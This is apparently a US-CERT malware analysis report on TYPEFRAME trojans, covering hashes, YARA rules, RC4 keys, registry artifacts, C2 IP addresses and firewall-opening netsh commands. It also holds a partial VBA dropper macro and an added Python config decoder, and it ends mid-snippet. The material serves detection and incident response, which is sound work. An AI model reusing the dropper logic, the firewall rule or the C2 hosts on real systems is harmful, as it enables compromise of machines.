Trojan.Agentb.Win32.18439\r\nYara Rules\r\nhidden_cobra_consolidated.yara\r\nrule import_obfuscation_2 {\r\n    meta:\r\n        author = \"NCCIC trusted 3rd party\"\r\n        incident = \"10135536\"\r\n        date = \"2018-04-12\"\r\n        category = \"hidden_cobra\"\r\n        family = \"TYPEFRAME\"\r\n        hash0 = \"bfb41bc0c3856aa0a81a5256b7b8da51\"\r\n    strings:\r\n        $s0 = { A6 D6 02 EB 4E B2 41 EB C3 EF 1F }\r\n        $s1 = { B6 DF 01 FD 48 B5 }\r\n        $s2 = { B6 D5 0E F3 4E B5 }\r\n        $s3 = { B7 DF 0E EE }\r\n        $s4 = { B6 DF 03 FC }\r\n        $s5 = { A7 D3 03 FC }\r\n    condition:\r\n        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and all of them\r\n}\r\nssdeep Matches\r\n100 dfb41457088fa2003a085c325bcb63666e1e66fa36bdc8975995bfbeac39500d\r\nPE Metadata\r\nCompile Date 2016-07-25 03:12:34-04:00\r\nImport Hash 100f0ee6d217c6b9e15be71a6c42a2d3\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n93649845b04705777d78e05982b93e5f header 4096 0.765196\r\naca858c8ea569b991797da02f8613716 .text 458752 6.614177\r\n11b9d8a29ef67ebb2c19f753f1c7ada4 .rdata 147456 5.918054\r\n72b7a8f5d846964649b682d6ef074cc0 .data 77824 4.964840\r\nd73a8feca0f13f34575c84df77fbed0e .rsrc 32768 7.100191\r\n61c29b19fe37db83e42ef9ddf46eb40f .reloc 40960 5.689934\r\nPackers/Compilers/Cryptors\r\nMicrosoft Visual C++ 6.0\r\nMicrosoft Visual C++ 6.0 DLL (Debug)\r\nDescription\r\nmidimapper.rs (original name: MDll.dll) is a proxy module installed as a service. 
This file is designed to open the Windows\r\nFirewall on the victim’s machine to allow incoming connections and force the compromised system to function as a proxy\r\nserver.\r\nThe malware’s APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:\r\n--Begin RC4 key--\r\n85 C0 7C 17 8B 4D F4 8B 76 20 33 C0 3B C8 77 0B\r\n--End RC4 key--\r\nWhen executed, the malware loads and decrypts the encrypted configuration file data from the registry using the same RC4\r\nkey.\r\n--Begin registry key--\r\nhKey = HKEY_LOCAL_MACHINE\r\nSubkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PrintConfigs\"\r\nValueName = \"Description\"\r\nValueData = \"RC4 encrypted configuration file data\"\r\n--End registry key--\r\nThe decrypted data contains a hexadecimal encoded port number (16-bit, stored little-endian):\r\n--Begin port # list--\r\nFB 20 ==\u003e 20FB ==\u003e 8443\r\n--End port # list--\r\nThe malware utilized the following command to open the Windows Firewall on the victim’s machine to allow incoming\r\nconnections.\r\n--Begin firewall modification--\r\n\"netsh.exe advfirewall firewall add rule name=\"PortOpenning\" dir=in protocol=tcp localport=8443 action=allow\r\nenable=yes\"\r\n--End firewall modification--\r\nThe malware attempts to open port 8443 and waits for a connection. The malware contains public SSL certificates in its\r\nresource named \"101\". 
It is designed to generate crafted TLS sessions (fake TLS communication mechanism).\r\nd1d490866d4a4d29306f0d9300bffc1450c41bb8fd62371d29672bf9f747bf92\r\nTags\r\ndropper, proxy, trojan\r\nDetails\r\nName BF474B8ACD55380B1169BB949D60E9E4\r\nSize 466241 bytes\r\nType PE32 executable (GUI) Intel 80386, for MS Windows\r\nMD5 bf474b8acd55380b1169bb949d60e9e4\r\nSHA1 c60c18fc0226a53be15637ee3ef0b73b0dabd854\r\nSHA256 d1d490866d4a4d29306f0d9300bffc1450c41bb8fd62371d29672bf9f747bf92\r\nSHA512 46995cf3516c160d2f4fa5957c8c67df75f2768b24562b22de46a5d4ef7ba17fecaef2ad900bc6925e0c4284802864361423653154ad0622af\r\nssdeep 12288:G+3/oi/EpRsV97/8Olq3p8YNk5oYEeLxCStEowZVKmZag:Gmoi/EpRsV9S3prgomLE9oVmQg\r\nEntropy 7.760001\r\nAntivirus\r\nAhnlab Malware/Win32.Generic\r\nAntiy Trojan/Win32.TSGeneric\r\nAvira TR/Autophyte.hctaa\r\nBitDefender Trojan.GenericKD.31017522\r\nClamAV Win.Trojan.Typeframe-6595034-1\r\nCyren W32/Trojan.SYHZ-1002\r\nESET a variant of Win32/NukeSped.EO trojan\r\nEmsisoft Trojan.GenericKD.31017522 (B)\r\nIkarus Trojan.Win32.Autophyte\r\nK7 Trojan ( 00535e7f1 )\r\nMcAfee RDN/Generic Dropper\r\nMicrosoft Security Essentials Trojan:Win32/Autophyte.B!dha\r\nNANOAV Trojan.Win32.Autophyte.feqzxh\r\nSophos Troj/Cruprox-B\r\nSymantec Trojan Horse\r\nTrendMicro BKDR_PROXSPED.A\r\nTrendMicro House Call BKDR_PROXSPED.A\r\nVirusBlokAda BScope.TrojanDropper.Agent\r\nZillya! 
Dropper.Agent.Win32.376404\r\nYara Rules\r\nhidden_cobra_consolidated.yara\r\nrule enc_PK_header {\r\n    meta:\r\n        author = \"NCCIC trusted 3rd party\"\r\n        incident = \"10135536\"\r\n        date = \"2018-04-12\"\r\n        category = \"hidden_cobra\"\r\n        family = \"TYPEFRAME\"\r\n        hash0 = \"3229a6cea658b1b3ca5ca9ad7b40d8d4\"\r\n    strings:\r\n        $s0 = { 5f a8 80 c5 a0 87 c7 f0 9e e6 }\r\n        $s1 = { 95 f1 6e 9c 3f c1 2c 88 a0 5a }\r\n        $s2 = { ae 1d af 74 c0 f5 e1 02 50 10 }\r\n    condition:\r\n        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them\r\n}\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2017-06-08 07:12:45-04:00\r\nImport Hash 225e9f7be86d6676c98a852492458049\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n21257d58787390491b672d426714b015 header 4096 0.592724\r\ndff4417e6006f193afa34a31581d52dd .text 53248 6.423430\r\n5fbeefe580cf5cb5ee032f29c78b5f7b .rdata 12288 3.435650\r\nc5776014ec07771c8d8093a7af1868c7 .data 16384 2.126011\r\nPackers/Compilers/Cryptors\r\nMicrosoft Visual C++ v6.0\r\nRelationships\r\nd1d490866d... Contains 40ef57ca2a617f5d24ac624339ba2027b6cf301c28684bf8b2075fc7a2e95116\r\nDescription\r\nThis 32-bit Windows executable is a RAT, designed to install a proxy module as a service on the victim’s system.\r\nThe malware's APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:\r\n--Begin RC4 key--\r\n75 0E 83 C0 02 83 C1 02 84 D2 75 E4 33 C0 EB 05\r\n--End RC4 key--\r\nDecrypted strings of interest are displayed below:\r\n--Begin strings of interest--\r\n\"wmplayer.xml\"\r\n\"printcache.tlb\"\r\n\"printcache\"\r\n\"Print Device Cache\"\r\n\"Manage Print Device Cache And Printing\"\r\n--End strings of interest--\r\nWhen executed, the malware loads an embedded RC4 encrypted archive file starting at offset \"0x15000\".\r\nThe malware decrypts the archive using the same RC4 key. 
The decrypted archive contains a proxy module, which is\r\ndecompressed and written from its archived name \"wmplayer.xml\" to \"C:\\Windows\\system32\\printcache.tlb\".\r\nThe malware registers the module as the ServiceDll of the \"printcache\" service group so that\r\n\"C:\\Windows\\system32\\printcache.tlb\" is loaded by the Windows service host process,\r\n\"%SYSTEMROOT%\\system32\\svchost.exe\".\r\n--Begin service--\r\nServiceName = \"printcache\"\r\nDisplayName = \"Print Device Cache\"\r\nDesiredAccess = SERVICE_ALL_ACCESS\r\nServiceType = SERVICE_WIN32_SHARE_PROCESS\r\nStartType = SERVICE_AUTO_START\r\nBinaryPathName = \"%SYSTEMROOT%\\system32\\svchost.exe -k printcache\"\r\n--End service--\r\nThe malware contains RC4 encrypted configuration data that holds port numbers (8 bytes). At runtime it\r\nwrites the encrypted configuration data to the following registry value:\r\n--Begin registry key--\r\nhKey = HKEY_LOCAL_MACHINE\r\nSubkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PrintConfigs\"\r\nValueName = \"Signature\"\r\nValueData = \"RC4 encrypted configuration file data\"\r\n--End registry key--\r\n40ef57ca2a617f5d24ac624339ba2027b6cf301c28684bf8b2075fc7a2e95116\r\nTags\r\nproxy, trojan\r\nDetails\r\nName 1printcache.tlb\r\nName CA67F84D5A4AC1459934128442C53B03\r\nSize 778240 bytes\r\nType PE32 executable (DLL) (GUI) Intel 80386, for MS Windows\r\nMD5 ca67f84d5a4ac1459934128442c53b03\r\nSHA1 f4eb6a50c60320edafb3e48c612c6a55560d0684\r\nSHA256 40ef57ca2a617f5d24ac624339ba2027b6cf301c28684bf8b2075fc7a2e95116\r\nSHA512 4695cf69e2ae52fc94eab31cbc3bb846022a3e1516d9bc293118f674ea1eb86468cff0a4c0dee8dff8a2d545df153116e8d86669513426e1b3\r\nssdeep 12288:drrF4D0d2QKPIyWE8QPnWnGHiS2VcL2ZotSNfpV532/dlZ:x6IGnWntQ2ZvfpvmdlZ\r\nEntropy 6.710797\r\nAntivirus\r\nAhnlab Trojan/Win32.Agent\r\nBitDefender Gen:Variant.Symmi.14589\r\nClamAV 
Win.Trojan.Typeframe-6595034-1\r\nCyren W32/Trojan.NVOE-8746\r\nESET a variant of Win32/NukeSped.EO trojan\r\nEmsisoft Gen:Variant.Symmi.14589 (B)\r\nIkarus Trojan.Win32.NukeSped\r\nK7 Trojan ( 00535e7f1 )\r\nMcAfee GenericRXFZ-TW!CA67F84D5A4A\r\nNANOAV Trojan.Win32.NukeSped.feqzxq\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 16 of 40\n\nSophos Troj/Cruprox-B\r\nSymantec Trojan Horse\r\nTrendMicro TROJ_PROXSPED.A\r\nTrendMicro House Call TROJ_PROXSPED.A\r\nVirusBlokAda Trojan.Agentb\r\nYara Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2017-06-08 07:12:35-04:00\r\nImport Hash 09e63e3d425d6b543de4003f71c2b66d\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n5b1f93f0412e9f1c7a7ad42d729b292b header 4096 0.769911\r\ne6ea312f762f4df521b229a77f186664 .text 475136 6.629464\r\nb6fa7b267ea19010d44f056ec3cca39d .rdata 147456 5.920344\r\n1076ec3948d21da8d6c5036548880c63 .data 77824 4.972282\r\n77c814f5856057e7a7f6237bbba51a76 .rsrc 32768 7.100017\r\n3184d0afb653bf0723cadccc14d92071 .reloc 40960 5.752155\r\nPackers/Compilers/Cryptors\r\nMicrosoft Visual C++ 6.0\r\nMicrosoft Visual C++ 6.0 DLL (Debug)\r\nRelationships\r\n40ef57ca2a... Contained_Within d1d490866d4a4d29306f0d9300bffc1450c41bb8fd62371d29672bf9f747bf92\r\nDescription\r\n1printcache.tlb (original name: PDll.dll) is a proxy module installed as a service by the file\r\nd1d490866d4a4d29306f0d9300bffc1450c41bb8fd62371d29672bf9f747bf92. 
This file is designed to open the Windows\r\nFirewall on the victim’s machine to allow incoming connections, so that the compromised system can function as a proxy\r\nserver.\r\nThe malware’s APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:\r\n--Begin RC4 key--\r\n75 0E 83 C0 02 83 C1 02 84 D2 75 E4 33 C0 EB 05\r\n--End RC4 key--\r\nWhen executed, it loads the encrypted configuration data from the registry and decrypts it with the same RC4 key.\r\n--Begin registry key--\r\nhKey = HKEY_LOCAL_MACHINE\r\nSubkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PrintConfigs\"\r\nValueName = \"Description\"\r\nValueData = \"RC4 encrypted configuration file data\"\r\n--End registry key--\r\nNote that the installer described above records this data under the value name \"Signature\"; when hunting, check both value names under this subkey.\r\nThe decrypted data contains port numbers stored as little-endian 16-bit values:\r\n--Begin port # list --\r\nBB 01 ==\u003e 1BB ==\u003e 443\r\n7F 00 ==\u003e 7F ==\u003e 127\r\nFB 20 ==\u003e 20FB ==\u003e 8443\r\n--End port # list --\r\nThe malware uses the following command to open the Windows Firewall on the victim’s machine to allow incoming\r\nconnections:\r\n--Begin firewall modification--\r\n\"netsh.exe advfirewall firewall add rule name=\"PortOpenning\" dir=in protocol=tcp localport=443 action=allow enable=yes\"\r\n--End firewall modification--\r\nThe malware then listens on ports 443, 127, and 8443 and waits for a connection. The malware contains public SSL\r\ncertificates in its resource named \"101\". 
It is designed to generate crafted TLS sessions (fake TLS communication\r\nmechanism).\r\n546dbd370a40c8e46f9b599a414f25000eec5ae6b3e046a035fe6e6cd5d874e1\r\nTags\r\ndownloaderdroppertrojan\r\nDetails\r\nName 6AB301FC3296E1CEB140BF5D294894C5\r\nSize 259584 bytes\r\nType PE32+ executable (DLL) (GUI) x86-64, for MS Windows\r\nMD5 6ab301fc3296e1ceb140bf5d294894c5\r\nSHA1 8d62498656db928f987b47bdbcfab5d6032be48a\r\nSHA256 546dbd370a40c8e46f9b599a414f25000eec5ae6b3e046a035fe6e6cd5d874e1\r\nSHA512 3abd7a690d821ace78d8f5e2394f0922308963c7ba8ee63661e9cdb2e36fe8353904346b4b0457c6ace3071505533187d62a41d47473a6a9\r\nssdeep 3072:JdHh7xVwMPRTxXX0bqkmvA7XKmJLiSi3Ix1DKXrlTNEsuFFCeojbmUkGVcNP+:17xVrxxn0PrWiv8hLnS+\r\nEntropy 5.918488\r\nAntivirus\r\nAhnlab Trojan/Win32.Agent\r\nAntiy Trojan/Win32.Cossta\r\nAvira TR/AD.APTLazerus.aroap\r\nBitDefender Trojan.GenericKD.31019942\r\nClamAV Win.Trojan.Typeframe-6595058-1\r\nCyren W64/Trojan.BVRT-3061\r\nESET a variant of Win32/NukeSped.AK trojan\r\nEmsisoft Trojan.GenericKD.31019942 (B)\r\nIkarus Trojan.Win32.NukeSped\r\nK7 Trojan ( 0051c2fd1 )\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 18 of 40\n\nMcAfee RDN/Generic.dx\r\nMicrosoft Security Essentials Trojan:Win32/Typeframe\r\nNANOAV Trojan.Win64.Cossta.feqzmr\r\nSymantec Trojan Horse\r\nTrendMicro TROJ64_.CF537F06\r\nTrendMicro House Call TROJ64_.CF537F06\r\nVirusBlokAda Trojan.Downloader\r\nZillya! 
Trojan.GenericKD.Win32.146686\r\nYara Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2017-05-08 11:43:26-04:00\r\nImport Hash b32c7db2b70ae7b183886924d873c585\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n24baa03194bc78f0184ea606128bc80f header 1024 2.821047\r\n170ce86f9a7ffcd242f3903fafe1f302 .text 57856 6.433615\r\n33b066692952c4534ebf0a56ca293085 .rdata 37888 5.095210\r\nb4eed5366c4254a3c7f6c2f021c29efe .data 156160 4.916035\r\n3ad7431aaa87a1e6b6400ca9b273d98a .pdata 4096 4.579212\r\nc23d2715b42b072fcf86b2aa58807b56 .rsrc 512 4.714485\r\nad711ec082866631d620286bb36fdb72 .reloc 2048 4.752156\r\nRelationships\r\n546dbd370a... Contains 3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210\r\nDescription\r\nThis file is a malicious 64-bit Windows dynamic-link library (DLL) that is designed to drop and execute an embedded file.\r\nThe malware decodes the embedded file by XORing it with the value \"0x35\".\r\nDuring analysis, the malware executed the file as C:\\Windows\\Temp\\java.exe\r\n(3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210). 
The dropped file has been identified as a\r\nRAT.\r\n3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210\r\nTags\r\nbackdoorremote-access-trojantrojan\r\nDetails\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 19 of 40\n\nName java.exe\r\nSize 118784 bytes\r\nType PE32 executable (GUI) Intel 80386, for MS Windows\r\nMD5 77b50bb476a85a7aa30c962a389838aa\r\nSHA1 df466a1f473c7c5eba5f22d90822fd1430b6a244\r\nSHA256 3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210\r\nSHA512 33b78e0bc8832958b79292bfebffe32c03b59b92044bb95331ee384f7061f6724c7d10bcf17ee1395dbd437b225c0813ba4bc5de6ef44f4bdd\r\nssdeep 3072:sPhrkoI8QYJRMs4y5pe+/a5sN5t4+PXP:Mi/lqpe+/0sa\r\nEntropy 5.880053\r\nAntivirus\r\nAhnlab Backdoor/Win32.Agent\r\nAntiy Trojan/Win32.Cossta\r\nAvira TR/Agent.bkecf\r\nBitDefender Trojan.GenericKD.30623185\r\nClamAV Win.Trojan.Typeframe-6595035-1\r\nCyren W32/Trojan.YPCX-1821\r\nESET a variant of Win32/NukeSped.AK trojan\r\nEmsisoft Trojan.GenericKD.30623185 (B)\r\nIkarus Trojan.Win32.NukeSped\r\nK7 Trojan ( 004fa2411 )\r\nMcAfee Trojan-FNWY!77B50BB476A8\r\nMicrosoft Security Essentials Trojan:Win32/Typeframe\r\nNANOAV Trojan.Win32.NukeSped.fajisv\r\nQuick Heal Trojan.MauvaiseRI.S5249940\r\nSophos Troj/Cruprox-A\r\nSymantec Backdoor.Cruprox\r\nSystweak trojan.nukesped\r\nTACHYON Backdoor/W32.Agent.118784.FE\r\nTrendMicro TROJ_NUKESPED.A\r\nTrendMicro House Call TROJ_NUKESPED.A\r\nVirusBlokAda Trojan.Cossta\r\nZillya! 
Trojan.Cossta.Win32.10325\r\nYara Rules\r\nhidden_cobra_consolidated.yara\r\nrule HC_RAT {\r\n    meta:\r\n        author = \"NCCIC Code \u0026 Media Analysis\"\r\n        incident = \"10135536\"\r\n        date = \"2018-04-12\"\r\n        category = \"hidden_cobra\"\r\n        family = \"TYPEFRAME\"\r\n        hash0 = \"1C53E7269FE9D84C6DF0A25BA59B822C\"\r\n    strings:\r\n        $s0 = { 8B 4C 24 04 33 C0 81 E1 FF FF 00 00 81 C1 00 80 FF FF 83 F9 43 0F 87 70 01 00 00 }\r\n        $s1 = { 88 04 30 40 3D 00 01 00 00 }\r\n        $s2 = { 48 89 4C 24 08 57 48 83 EC 20 0F B7 C1 33 FF 05 00 80 FF FF 83 F8 43 0F 87 60 02 00 00 }\r\n        $s3 = { 88 01 FF C0 48 FF C1 3D 00 01 00 00 }\r\n    condition:\r\n        ($s0 and $s1) or ($s2 and $s3)\r\n}\r\nssdeep Matches\r\n94 7429a6b6e8518a1ec1d1c37a8786359885f2fd4abde560adaef331ca9deaeefd\r\nPE Metadata\r\nCompile Date 2017-04-28 03:28:32-04:00\r\nImport Hash 85c89bf0449505044219f0be26213402\r\nCompany Name Microsoft Corporation\r\nFile Description ProQuota\r\nInternal Name proquota\r\nLegal Copyright Microsoft Corporation. All rights reserved.\r\nOriginal Filename proquota.exe.mui\r\nProduct Name Microsoft Windows Operating System\r\nProduct Version 6.1.7600.16385\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n81c12eb5fc3cbdd06675cd1097363a40 header 4096 0.689960\r\n2539474aa6202371abd37a4d66031955 .text 86016 6.641666\r\nb97c14b801643b3a61ea28266f3f71b1 .rdata 8192 4.735406\r\n48eb8a67d4fd42ea24da9dc9029cb101 .data 16384 1.857068\r\nc139ac9cb34e0620a10c15e5d42b85d2 .rsrc 4096 1.174962\r\nPackers/Compilers/Cryptors\r\nMicrosoft Visual C++ v6.0\r\nRelationships\r\n3c809a1010... Contained_Within 546dbd370a40c8e46f9b599a414f25000eec5ae6b3e046a035fe6e6cd5d874e1\r\n3c809a1010... Connected_To 184.107.209.2\r\n3c809a1010... Connected_To 111.207.78.204\r\n3c809a1010... Connected_To 80.91.118.45\r\n3c809a1010... Connected_To 181.119.19.56\r\nDescription\r\nThis file is a 32-bit Windows executable designed to connect to its remote server and wait for instructions. 
The malware’s\r\nAPIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:\r\n--Begin RC4 key--\r\nDA E1 61 FF 0C 27 95 87 17 57 A4 D6 EA E3 82 2B\r\n--End RC4 key--\r\nThis file is a RAT and contains the following embedded C2 IP addresses and port number. They are stored as little-endian values, so the constants as they appear in the disassembly read byte-reversed: 2D765B50h, for example, is the byte sequence 50 5B 76 2D, i.e. 80.91.118.45:\r\n--Begin IP and port # list--\r\n1BBh ==\u003e 443\r\n2D765B50h ==\u003e 80.91.118.45\r\n381377B5h ==\u003e 181.119.19.56\r\n0CC4ECF6Fh ==\u003e 111.207.78.204\r\n2D16BB8h ==\u003e 184.107.209.2\r\n--End IP and port # list--\r\nWhen executed, it attempts to connect to its C2 IPs on port 443 and waits for instructions. The malware is designed to\r\naccept instructions from the remote server to perform the following functions:\r\n--Begin functions performed by the malware--\r\nSearch for files\r\nExecute a process\r\nTerminate processes\r\nDelete files\r\nExecute commands via a shell\r\nDownload and upload files\r\nRead and write files\r\n--End functions performed by the malware--\r\nThe malware uses the same RC4 key to encrypt its configuration data, which contains the\r\nC2 IP address and port number in the same little-endian encoding. 
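The configuration layout the report decodes by hand above, and the proxy module's port-only list earlier on this page, can be reproduced offline. The following Python is an added example written for this edition, not code from the CISA report or from the malware: it implements plain RC4 with the three keys the report publishes and parses the decrypted bytes the way the report's own hex listings imply, a little-endian 16-bit port followed by IPv4 addresses held as raw octets (the dword 2D765B50h seen in the disassembly is the bytes 50 5B 76 2D in memory). It generalises to any number of addresses after the port and also handles the proxy module's layout of consecutive 16-bit ports. It assumes the registry value holds exactly the RC4 ciphertext of these bytes with no additional header or length field; the encrypted sample blobs are constructed inside the script by encrypting the report's decoded bytes, not captured from an infected host.

```python
"""Decode TYPEFRAME-style RC4-encrypted configuration data (added example)."""
import ipaddress
import struct
from typing import List, Tuple, Union

# RC4 keys as published in the report, one per sample family.
RC4_KEY_PRINTCACHE = bytes.fromhex("75 0E 83 C0 02 83 C1 02 84 D2 75 E4 33 C0 EB 05")
RC4_KEY_JAVA_RAT = bytes.fromhex("DA E1 61 FF 0C 27 95 87 17 57 A4 D6 EA E3 82 2B")
RC4_KEY_DWNHOST = bytes.fromhex("85 C0 7C 17 8B 4D F4 8B 76 20 33 C0 3B C8 77 0B")


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def ip_from_dword(dword: int) -> str:
    """Dword as shown in the disassembly (little-endian in memory) -> dotted quad."""
    return str(ipaddress.IPv4Address(struct.pack("<I", dword)))


def parse_proxy_ports(plain: bytes) -> List[int]:
    """Proxy-module layout: a sequence of little-endian 16-bit listening ports."""
    if not plain or len(plain) % 2:
        raise ValueError("port list must be a non-empty, even number of bytes")
    return [port for (port,) in struct.iter_unpack("<H", plain)]


def parse_rat_config(plain: bytes) -> Tuple[int, List[str]]:
    """RAT layout: little-endian 16-bit port, then one or more IPv4 addresses as raw octets."""
    if len(plain) < 6 or (len(plain) - 2) % 4:
        raise ValueError("expected a 2-byte port followed by 4-byte IPv4 addresses")
    port = struct.unpack_from("<H", plain, 0)[0]
    ips = [str(ipaddress.IPv4Address(plain[off:off + 4]))
           for off in range(2, len(plain), 4)]
    return port, ips


def decode_registry_value(key: bytes, value: bytes,
                          layout: str) -> Union[List[int], Tuple[int, List[str]]]:
    """Decrypt registry value data with the sample's key and parse it by layout."""
    plain = rc4(key, value)
    if layout == "proxy":
        return parse_proxy_ports(plain)
    if layout == "rat":
        return parse_rat_config(plain)
    raise ValueError(f"unknown layout: {layout}")


# Constructed test blobs: the report's decoded bytes, RC4-encrypted here with the
# published keys. They are NOT registry data captured from an infected host.
SAMPLE_PRINTCACHE_VALUE = rc4(RC4_KEY_PRINTCACHE, bytes.fromhex("BB 01 7F 00 FB 20"))
SAMPLE_DWNHOST_VALUE = rc4(RC4_KEY_DWNHOST, bytes.fromhex("BB 01 3B 5A 5D 61"))
SAMPLE_JAVA_RAT_VALUE = rc4(
    RC4_KEY_JAVA_RAT,
    struct.pack("<HIIII", 443, 0x2D765B50, 0x381377B5, 0xCC4ECF6F, 0x02D16BB8),
)

if __name__ == "__main__":
    print(decode_registry_value(RC4_KEY_PRINTCACHE, SAMPLE_PRINTCACHE_VALUE, "proxy"))
    print(decode_registry_value(RC4_KEY_DWNHOST, SAMPLE_DWNHOST_VALUE, "rat"))
    print(decode_registry_value(RC4_KEY_JAVA_RAT, SAMPLE_JAVA_RAT_VALUE, "rat"))
```

The same functions can be pointed at the binary data of the Signature or Description value exported from the PrintConfigs or ShellCompatibility subkeys the report names, using the key of the matching sample. A decrypt that yields ports outside 1..65535 or addresses that are clearly not routable is the usual sign that the key or layout belongs to a different variant.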
The encrypted configuration data is stored into the following registry key:\r\n--Begin registry key--\r\nhKey = HKEY_LOCAL_MACHINE\r\nSubkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellCompatibility\\Applications\\\"\r\nValueName = \"Description\"\r\nValueData = \"RC4 encrypted configuration file data\"\r\n--End registry key--\r\n4bd7d801d7ce3fe9c2928dbc834b296e934473f5bbcc9a1fd18af5ebd43192cd\r\nTags\r\ndownloaderdroppertrojan\r\nDetails\r\nName 3229A6CEA658B1B3CA5CA9AD7B40D8D4\r\nSize 712192 bytes\r\nType\r\nComposite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 949, Author: ISkyISea, Template: Norm\r\nBy: ISkyISea, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Total Editing Time: 17:00, Create Time/Date\r\n18:36:00 2017, Last Saved Time/Date: Thu Apr 6 00:34:00 2017, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, S\r\nMD5 3229a6cea658b1b3ca5ca9ad7b40d8d4\r\nSHA1 70730e608e2fcc68ce468ed148e965c5bacfb51c\r\nSHA256 4bd7d801d7ce3fe9c2928dbc834b296e934473f5bbcc9a1fd18af5ebd43192cd\r\nSHA512 ff385a9446415412950562cca832eab1d17de56932f3633a86202dea829e8bd25e56864306f2e6c8bb7ff7d2cfe2785acc4261410e38348946\r\nssdeep 12288:sh+81FiNloAzjMXJ1NPeZ3eMNZtF7fHRRAug0EX7:W1FiNWEYxeV3NfHDe\r\nEntropy 5.446016\r\nAntivirus\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 22 of 40\n\nAhnlab MSOffice/Dropper\r\nAntiy Trojan[Downloader]/MSOffice.Agent.ye\r\nBitDefender VB:Trojan.Valyria.401\r\nClamAV Doc.Dropper.Agent-6591386-0\r\nCyren Trojan.TKGI-6\r\nESET VBA/TrojanDropper.Agent.YE trojan\r\nEmsisoft VB:Trojan.Valyria.401 (B)\r\nIkarus Trojan-Dropper.VBA.Agent\r\nMcAfee W97M/Dropper.dj\r\nMicrosoft Security Essentials TrojanDropper:O97M/SilverMob.A!dha\r\nNANOAV Trojan.Ole2.Vbs-heuristic.druvzi\r\nQuick Heal W97M.Downloader.BJS\r\nSophos Troj/DocDl-KOR\r\nSymantec W97M.Downloader\r\nTACHYON Suspicious/W97M.Obfus.Gen.2\r\nTrendMicro W2KM_SILVMOB.A\r\nTrendMicro House Call 
W2KM_SILVMOB.A\r\nYara Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nDescription\r\nThis is a malicious Microsoft Word document containing Visual Basic for Applications (VBA) macros. When the\r\ndocument is opened, Word prompts the user to enable macros. If the user enables\r\nmacro execution, the embedded malicious macro decodes a PE binary, writes it to\r\n\"%TEMP%\\leo.exe\" and runs it through a WScript.Shell object. It then decodes a second embedded file, a decoy Word document, into the same\r\ndirectory with the hidden and system attributes set, opens it, gives its window the original document's name and closes the\r\nmalicious document. The strings naming the dropped files and the COM object are obfuscated with simple per-character shifts. The code\r\nsnippet used to decode the malicious binary is displayed below (comments added in this edition):\r\n--Begin code snippet--\r\n   On Error GoTo gaqz\r\n      ' Each character is shifted by -1 at runtime: \"mfp/fyf\" becomes \"leo.exe\"\r\n      liveOn = \"mfp/fyf\"\r\n      liveOff = Environ(\"temp\") + \"\\\"\r\n   For qnx = 1 To Len(liveOn)\r\n       liveOff = liveOff + Chr(Asc(Mid$(liveOn, qnx, 1)) - 1)\r\n   Next\r\n      ' The payload is carried as hex strings, 500 bytes (1000 hex digits) per element\r\n      Dim str(238) As String\r\n   str(1) = \"Encoded hex data\"\r\n   str(2) = \"Encoded hex data\"\r\n   str(3) = \"Encoded hex data\"\r\n   str(4) = \"Encoded hex data\"\r\n   str(5) = \"Encoded hex data\"\r\n   .......\r\n   .......\r\n   str(238) = \"Encoded hex data\"\r\n   Dim offBin(499) As Byte\r\n   str(1) = \"Encoded hex data\"\r\n   str(2) = \"Encoded hex data\"\r\n   str(3) = \"Encoded hex data\"\r\n   ......\r\n   ......\r\n   str(499) = \"Encoded hex data\"\r\n   ' Hex-decode each 500-byte chunk, XOR every byte with 231 (0xE7) and append it to the file\r\n   Open liveOff For Binary Access Write As #1\r\n   lpdq = 1\r\n   For jnx = 0 To 237\r\n       For inx = 0 To 499\r\n           offBin(inx) = Val(\"\u0026H\" + Mid(str(jnx + 1), inx * 2 + 1, 2))\r\n           offBin(inx) = offBin(inx) Xor 231\r\n       Next inx\r\n       Put #1, lpdq, offBin\r\n       lpdq = lpdq + 500\r\n   Next jnx\r\n   Close #1\r\n   ' Run the decoded PE (see jfsukew below)\r\n   jfsukew liveOff\r\n   ' Decoy document name, same -1 shift: 